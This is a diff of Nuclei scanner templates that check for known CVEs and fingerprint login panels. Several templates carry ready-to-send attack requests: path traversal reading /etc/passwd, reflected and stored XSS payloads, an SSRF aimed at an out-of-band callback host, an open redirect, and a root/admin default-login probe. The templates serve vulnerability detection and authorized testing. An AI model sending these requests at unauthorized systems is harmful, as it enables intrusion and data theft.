description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability.
|
||||
reference:
|
||||
- https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
|
||||
tags: cve,cve2020,cacti,rce,oast
|
||||
|
|
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2021-21973
|
||||
|
||||
info:
|
||||
name: VMware vCenter Unauthenticated SSRF
|
||||
author: pdteam
|
||||
severity: medium
|
||||
description: The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-21973
|
||||
- https://twitter.com/osama_hroot/status/1365586206982082560
|
||||
- https://twitter.com/bytehx343/status/1486582542807420928
|
||||
tags: cve,cve2021,vmware,ssrf,vcenter,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.30
|
||||
cve-id: CVE-2021-21973
|
||||
cwe-id: CWE-918
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Vcip: {{interactsh-url}}
|
||||
Vcpassword: {{rand_base(6)}}
|
||||
Vcusername: {{rand_base(6)}}
|
||||
Reqresource: {{rand_base(6)}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 500
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "The server sent HTTP status code 200"
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2021-24838
|
||||
|
||||
info:
|
||||
name: AnyComment <= 0.2.21 - Open Redirect
|
||||
author: noobexploiter
|
||||
severity: medium
|
||||
description: The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24838
|
||||
tags: wordpress,wp-plugin,open-redirect
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-24838
|
||||
cwe-id: CWE-601
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
|
@ -0,0 +1,34 @@
|
|||
id: CVE-2021-25864
|
||||
|
||||
info:
|
||||
name: Hue Magic - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: node-red-contrib-huemagic 3.0.0 is affected by hue/assets/..%2F Directory Traversal.in the res.sendFile API, used in file hue-magic.js, to fetch an arbitrary file.
|
||||
reference:
|
||||
- https://github.com/Foddy/node-red-contrib-huemagic/issues/217
|
||||
- https://www.cvedetails.com/cve/CVE-2021-25864
|
||||
metadata:
|
||||
shodan-query: title:"NODE-RED"
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2021-25864
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2021,huemagic,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -4,7 +4,7 @@ info:
|
|||
author: dhiyaneshDk,philippedelteil
|
||||
severity: critical
|
||||
name: Confluence Server OGNL injection - RCE
|
||||
description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
|
||||
description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
|
||||
tags: cve,cve2021,rce,confluence,injection,ognl
|
||||
reference:
|
||||
- https://jira.atlassian.com/browse/CONFSERVER-67940
|
||||
|
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2021-26247
|
||||
|
||||
info:
|
||||
name: Unauthenticated XSS Cacti - auth_changepassword.php
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: As an unauthenticated remote user, visit "http://<CACTI_SERVER>/auth_changepassword.php?ref=<script>alert(1)</script>" to successfully execute the JavaScript payload present in the "ref" URL parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-26247
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-26247
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,cacti,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"></script><script>alert(document.domain)</script>'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,12 +1,17 @@
|
|||
id: CVE-2021-29156
|
||||
|
||||
info:
|
||||
name: LDAP Injection In Openam
|
||||
name: LDAP Injection In OpenAM
|
||||
author: melbadry9,xelkomy
|
||||
severity: high
|
||||
tags: cve,cve2021,openam,ldap,injection
|
||||
description: The vulnerability was found in the password reset feature that OpenAM provides. When a user tries to reset his password, he is asked to enter his username then the backend validates whether the user exists or not through an LDAP query before the password reset token is sent to the user’s email.
|
||||
reference: https://blog.cybercastle.io/ldap-injection-in-openam/
|
||||
description: OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval.
|
||||
remediation: Upgrade to OpenAM commercial version 13.5.1 or later.
|
||||
reference:
|
||||
https://github.com/sullo/advisory-archives/blob/master/Forgerock_OpenAM_LDAP_injection.md
|
||||
https://hackerone.com/reports/1278050
|
||||
https://www.guidepointsecurity.com/blog/ldap-injection-in-forgerock-openam-exploiting-cve-2021-29156/
|
||||
https://portswigger.net/research/hidden-oauth-attack-vectors
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
|
@ -24,3 +29,5 @@ requests:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body, "jato.pageSession") && status_code==200'
|
||||
|
||||
# Enhanced by cs on 2022/01/24
|
||||
|
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2021-32682
|
||||
|
||||
info:
|
||||
name: elFinder - Multiple vulnerabilities leading to RCE
|
||||
author: smaranchand
|
||||
severity: critical
|
||||
tags: cve,cve2021,elfinder,misconfig,rce,oss
|
||||
description: elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication.
|
||||
reference:
|
||||
- https://smaranchand.com.np/2022/01/organization-vendor-application-security/
|
||||
- https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities
|
||||
- https://github.com/Studio-42/elFinder/security/advisories/GHSA-wph3-44rj-92pr
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-32682
|
||||
remediation: Update to elFinder 2.1.59
|
||||
metadata:
|
||||
github: https://github.com/Studio-42/elFinder
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2021-32682
|
||||
cwe-id: CWE-22,CWE-78,CWE-918
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/elfinder/elfinder-cke.html"
|
||||
- "{{BaseURL}}/assets/backend/elfinder/elfinder-cke.html"
|
||||
- "{{BaseURL}}/assets/elFinder-2.1.9/elfinder.html"
|
||||
- "{{BaseURL}}/assets/elFinder/elfinder.html"
|
||||
- "{{BaseURL}}/backend/elfinder/elfinder-cke.html"
|
||||
- "{{BaseURL}}/elfinder/elfinder-cke.html"
|
||||
- "{{BaseURL}}/uploads/assets/backend/elfinder/elfinder-cke.html"
|
||||
- "{{BaseURL}}/uploads/assets/backend/elfinder/elfinder.html"
|
||||
- "{{BaseURL}}/uploads/elfinder/elfinder-cke.html"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "elfinder"
|
||||
- "php/connector"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,36 @@
|
|||
id: CVE-2021-32853
|
||||
|
||||
info:
|
||||
name: Erxes <= v0.23.0 XSS
|
||||
author: dwisiswant0
|
||||
severity: medium
|
||||
description: Erxes prior to version 0.23.0 is vulnerable to cross-site scripting.The value of topicID parameter is not escaped & triggered in the enclosing script tag.
|
||||
reference:
|
||||
- https://securitylab.github.com/advisories/GHSL-2021-103-erxes/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3285
|
||||
metadata:
|
||||
shodan-query: http.title:"erxes"
|
||||
tags: cve,cve2021,xss,erxes,oss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'topic_id: "</script><script>alert(document.domain)</script>'
|
||||
- "window.erxesEnv"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -13,7 +13,7 @@ info:
|
|||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.30
|
||||
cve-id: CVE-2021-38314
|
||||
description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site’s `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`."
|
||||
description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site's `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`."
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -0,0 +1,48 @@
|
|||
id: CVE-2021-39350
|
||||
|
||||
info:
|
||||
name: FV Flowplayer Video Player WordPress plugin - Authenticated Reflected XSS
|
||||
author: gy741
|
||||
severity: medium
|
||||
description: The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts, in versions 7.5.0.727 - 7.5.2.727.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/e9adc166-be7f-4066-a2c1-7926c6304fc9
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-39350
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-39350
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,wordpress,xss,wp,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=fv_player_stats&player_id=1</script><script>alert(document.domain)</script> HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-40960
|
||||
|
||||
info:
|
||||
name: Galera WebTemplate 1.0 – Directory Traversal
|
||||
name: Galera WebTemplate 1.0 Directory Traversal
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow.
|
||||
|
|
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2021-45380
|
||||
|
||||
info:
|
||||
name: AppCMS - Reflected Cross-Site Scripting (XSS)
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: AppCMS 2.0.101 has a XSS injection vulnerability in \templates\m\inc_head.php
|
||||
reference:
|
||||
- https://github.com/source-trace/appcms/issues/8
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-45380
|
||||
tags: cve,cve2021,appcms,xss
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-45380
|
||||
cwe-id: CWE-79
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '""></script><script>alert(document.domain)</script>'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,111 @@
|
|||
id: CVE-2021-46005
|
||||
|
||||
info:
|
||||
name: Sourcecodester Car Rental Management System 1.0 - Stored XSS
|
||||
author: cckuailong
|
||||
severity: medium
|
||||
description: Sourcecodester Car Rental Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via vehicalorcview parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/49546
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-46005
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2021-46005
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,xss,sourcecodester,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /admin/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Connection: close
|
||||
|
||||
username={{username}}&password={{password}}&login=
|
||||
|
||||
- |
|
||||
POST /admin/post-avehical.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="vehicletitle"
|
||||
|
||||
Test
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="brandname"
|
||||
|
||||
1
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="vehicalorcview"
|
||||
|
||||
</script><script>alert(document.domain)</script>
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="priceperday"
|
||||
|
||||
500
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="fueltype"
|
||||
|
||||
Petrol
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="modelyear"
|
||||
|
||||
2022
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="seatingcapacity"
|
||||
|
||||
5
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="img1"; filename="test.png"
|
||||
Content-Type: image/png
|
||||
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="img2"; filename="test.png"
|
||||
Content-Type: image/png
|
||||
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="img3"; filename="test.png"
|
||||
Content-Type: image/png
|
||||
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="img4"; filename="test.png"
|
||||
Content-Type: image/png
|
||||
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="img5"; filename=""
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="submit"
|
||||
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv--
|
||||
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting (XSS)
|
||||
author: hexcat
|
||||
severity: high
|
||||
description: WordPress Email Template Designer – WP HTML Mail allows stored XSS through an unprotected REST-API endpoint (CVE-2022-0218).
|
||||
description: WordPress Email Template Designer WP HTML Mail allows stored XSS through an unprotected REST-API endpoint (CVE-2022-0218).
|
||||
reference:
|
||||
- https://www.wordfence.com/blog/2022/01/unauthenticated-xss-vulnerability-patched-in-html-email-template-designer-plugin/
|
||||
- https://wordpress.org/plugins/wp-html-mail/
|
||||
|
|
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2022-23944
|
||||
|
||||
info:
|
||||
name: ShenYu Admin Unauth Access
|
||||
author: cckuakilong
|
||||
severity: medium
|
||||
description: User can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.
|
||||
reference:
|
||||
- https://github.com/apache/incubator-shenyu/pull/2462/files
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-23944
|
||||
- https://github.com/cckuailong/reapoc/blob/main/2022/CVE-2022-23944/vultarget/README.md
|
||||
classification:
|
||||
cve-id: CVE-2022-23944
|
||||
cwe-id: CWE-862
|
||||
tags: cve,cve2022,shenyu,unauth,apache
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugin"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"message":"query success"'
|
||||
- '"code":200'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,33 @@
|
|||
id: mofi4500-default-login
|
||||
|
||||
info:
|
||||
name: MOFI4500-4GXeLTE-V2 Default Login
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
tags: mofi,default-login
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /cgi-bin/luci/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
username=root&password=admin
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
username:
|
||||
- root
|
||||
password:
|
||||
- admin
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "MOFI4500 - General - LuCI"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,28 @@
|
|||
id: bigbluebutton-login
|
||||
|
||||
info:
|
||||
name: BigBlueButton Login Panel
|
||||
author: myztique
|
||||
severity: info
|
||||
reference: https://github.com/bigbluebutton/greenlight
|
||||
tags: panel,bigbluebutton
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'content="BigBlueButton'
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
name: version
|
||||
group: 1
|
||||
regex:
|
||||
- 'Greenlight<\/a>\. (.*)'
|
|
@ -0,0 +1,24 @@
|
|||
id: flightpath-panel
|
||||
info:
|
||||
name: FlightPath Panel
|
||||
author: princechaddha
|
||||
severity: info
|
||||
metadata:
|
||||
shodan-query: http.title:"flightpath"
|
||||
tags: panel,flightpath
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/login"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>Login | FlightPath</title>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,25 @@
|
|||
id: jamf-panel
|
||||
|
||||
info:
|
||||
name: JAMF MDM Panel
|
||||
author: pdteam
|
||||
severity: info
|
||||
metadata:
|
||||
shodan-query: http.favicon.hash:1262005940
|
||||
tags: jamf,panel,mdm
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: all
|
||||
words:
|
||||
- "Jamf Pro Login"
|
||||
- "Jamf Cloud Node"
|
||||
condition: or
|
|
@ -1,7 +1,7 @@
|
|||
id: joomla-panel
|
||||
|
||||
info:
|
||||
name: Joomla Panel
|
||||
name: Joomla! Panel
|
||||
author: its0x08
|
||||
severity: info
|
||||
tags: panel,joomla
|
||||
|
@ -16,3 +16,5 @@ requests:
|
|||
- '<meta name="generator" content="Joomla! - Open Source Content Management" />'
|
||||
- '/administrator/templates/isis/images/joomla.png'
|
||||
condition: or
|
||||
|
||||
# Enhanced by cs on 2022/01/28
|
||||
|
|
|
@ -0,0 +1,24 @@
|
|||
id: netdata-dashboard-detect
|
||||
info:
|
||||
name: NetData Dashboard Detect
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
metadata:
|
||||
shodan-dork: 'Server: NetData Embedded HTTP Server'
|
||||
tags: netdata,panel,tech
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<title>netdata dashboard</title>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,10 +1,12 @@
|
|||
id: openam-detect
|
||||
id: openam-panel
|
||||
|
||||
info:
|
||||
name: Detect OpenAM and OpenSSO
|
||||
name: OpenAM and OpenSSO Login Panel
|
||||
author: philippedelteil
|
||||
severity: info
|
||||
tags: tech,openam
|
||||
metadata:
|
||||
shodan-query: http.title:"OpenAM"
|
||||
tags: panel,openam,opensso,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -16,6 +18,7 @@ requests:
|
|||
- "{{BaseURL}}/sso/XUI"
|
||||
- "{{BaseURL}}/sso/UI"
|
||||
- "{{BaseURL}}/sso/UI/#login"
|
||||
- "{{BaseURL}}/opensso/UI/Login"
|
||||
- "{{BaseURL}}/openam/UI/login"
|
||||
- "{{BaseURL}}/openam/UI/#loginlogin"
|
||||
- "{{BaseURL}}/openam/UI/Login"
|
|
@ -0,0 +1,28 @@
|
|||
id: openbmcs-detect
|
||||
|
||||
info:
|
||||
name: openbmcs-detect
|
||||
author: ffffffff0x
|
||||
severity: info
|
||||
tags: openbmcs,detect
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'BMS - Login'
|
||||
- 'Copyright all rights reserved by Open BMCS'
|
||||
- 'OpenBMCS does not support Internet Explorer'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,10 +1,12 @@
|
|||
id: opensis-detect
|
||||
|
||||
info:
|
||||
name: OpenSIS Detect
|
||||
name: OpenSIS Login Panel
|
||||
author: pikpikcu
|
||||
severity: info
|
||||
tags: tech,opensis
|
||||
metadata:
|
||||
shodan-query: http.title:"openSIS"
|
||||
tags: panel,opensis,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -12,6 +14,7 @@ requests:
|
|||
- "{{BaseURL}}"
|
||||
- "{{BaseURL}}/opensis/index.php"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
|
@ -1,10 +1,12 @@
|
|||
id: openx-detect
|
||||
id: openx-panel
|
||||
|
||||
info:
|
||||
name: OpenX detect
|
||||
name: OpenX Login Panel
|
||||
author: pikpikcu
|
||||
severity: info
|
||||
tags: tech,openx
|
||||
metadata:
|
||||
shodan-query: http.title:"OpenX"
|
||||
tags: panel,openx,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
|
@ -1,22 +1,29 @@
|
|||
id: phpcollab-detect
|
||||
id: phpcollab-panel
|
||||
|
||||
info:
|
||||
name: PhpCollab detect
|
||||
name: PhpCollab Login Panel
|
||||
author: pikpikcu
|
||||
severity: info
|
||||
tags: tech,phpcollab
|
||||
metadata:
|
||||
shodan-query: http.title:"PhpCollab"
|
||||
tags: panel,phpcollab,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/general/login.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<title>PhpCollab</title>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
|
@ -1,10 +1,12 @@
|
|||
id: remkon-manager-detect
|
||||
id: remkon-manager-panel
|
||||
|
||||
info:
|
||||
name: Remkon Device Manager Detect
|
||||
author: pikpikcu
|
||||
name: Remkon Device Manager Login Panel
|
||||
